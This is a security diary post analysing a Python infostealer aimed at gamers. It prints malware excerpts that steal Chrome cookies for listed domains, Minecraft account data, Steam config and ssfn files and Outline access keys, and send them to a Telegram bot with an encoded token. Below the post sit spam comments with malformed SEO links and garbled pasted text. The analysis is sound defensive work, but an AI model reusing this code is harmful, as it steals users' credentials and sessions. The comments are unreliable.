Python Infostealer Targeting Gamers

Published: 2023-03-01
Last Updated: 2023-03-01 09:15:08 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].

I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).

Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)

The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.

First, Chrome data is inspected, and only interesting domains are searched:

target_domain = [
    "minecraft.net", 
    "google.com", 
    "live.com", 
    "apple.com", 
    "twitter.com", 
    "spotify.com", 
    "discord.com", 
    "discord.gg", 
    "blockchain.com", 
    "coinbase.com", 
    "paypal.com", 
    "mojang.com", 
    "steamcommunity.com", 
    "steampowered.com", 
    "origin.com", 
    "ea.com", 
    "ubisoft.com"
]

Then, the script searches for the presence of Minecraft:

if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass

Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:

try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True

except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]

for user in send_to_users:
    bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name:  `{socket.gethostname()}`\n??User:  `{os.getlogin()}`\n?OC:  `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
                file.close()

They also search for Outline Manager instances:

if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!

[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: Gamers Games Infostealer Malware Python
1 comment(s)
ISC Stormcast For Wednesday, March 1st, 2023 https://isc.sans.edu/podcastdetail.html?id=8390

Comments

What's this all about ..?

Anonymous

Dec 3rd 2022
9 months ago

password reveal .

Anonymous

Dec 3rd 2022
9 months ago

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission

Anonymous

Dec 26th 2022
9 months ago

https://thehomestore.com.pk/

Anonymous

Dec 26th 2022
9 months ago

<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>

Anonymous

Dec 26th 2022
9 months ago

<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>

Anonymous

Dec 26th 2022
9 months ago

https://defineprogramming.com/

Anonymous

Dec 26th 2022
9 months ago

https://defineprogramming.com/

https://defineprogramming.com/

Dec 26th 2022
9 months ago

Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/

https://defineprogramming.com/

Dec 26th 2022
9 months ago

Enter corthrthmment here...

rthrth

Jan 2nd 2023
8 months ago

Login here to join the discussion.


Diary Archives